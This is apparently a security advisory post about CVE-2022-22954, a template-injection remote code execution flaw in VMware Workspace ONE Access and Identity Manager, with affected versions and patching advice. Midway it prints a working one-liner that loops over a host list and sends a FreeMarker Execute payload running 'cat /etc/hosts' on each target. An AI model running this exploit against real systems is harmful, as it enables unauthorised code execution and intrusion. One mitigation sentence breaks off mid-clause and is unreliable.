Attackers have begun exploiting CVE-2022-22954, a RCE vulnerability in VMware Workspace ONE Access and Identity Manager, to deliver crypto miners onto vulnerable systems.

CRITICAL RCE IN VMWARE WORKSPACE ONE ACCESS AND VMWARE IDENTITY MANAGER

The software vendor released a security advisory for the vulnerability on April 6, 2022, warning about the possibility of a threat actor with network access triggering a server-side template injection that results in RCE.

About CVE-2022-22954

CVE-2022-22954 is, in effect, a server-side template injection vulnerability that can be triggered by a malicious actor with network access to achieve remote code execution.

CVE-2022-22954 is the most critical of the bunch, and VMware urged administrators to patch or mitigate it immediately, as “the ramifications of this vulnerability are serious.”

Affected Versions:

List of affected versions 

Product Component  Version(s)  
VMware Workspace ONE Access Appliance  21.08.0.1   
VMware Workspace ONE Access Appliance  21.08.0.0 
VMware Workspace ONE Access Appliance  20.10.0.1   
VMware Workspace ONE Access Appliance  20.10.0.0   
VMware Identity Manager Appliance 3.3.6 
VMware Identity Manager Appliance 3.3.5
VMware Identity Manager Appliance 3.3.4
VMware Identity Manager Appliance 3.3.3 

CVE-2022-22954 One Liner:

cat file | while read h do ; do curl -sk –path-as-is “$h/catalog-portal/ui/oauth/verify?error=&deviceUdid=${“freemarker.template.utility.Execute”?new()(“cat /etc/hosts”)}”| grep “context” && echo “$h\033[0;31mV\n”|| echo “$h \033[0;32mN\n”;done

Mitigation

Threat actors are actively scanning for vulnerable hosts, with cybersecurity intelligence firm. Some of these threat actors are then closing the vulnerability once they gain control of the server. Due to its active exploitation, if you haven’t applied the VMware security updates or mitigations yet, it is extremely urgent to do so as soon as possible. For users of VMware products, it is worth noting that the vendor’s advisory lists several high severity flaws apart from the aforementioned RCE, which affect additional products besides Workspace One Access and Identity Manager, so make sure that you’re using the latest available version.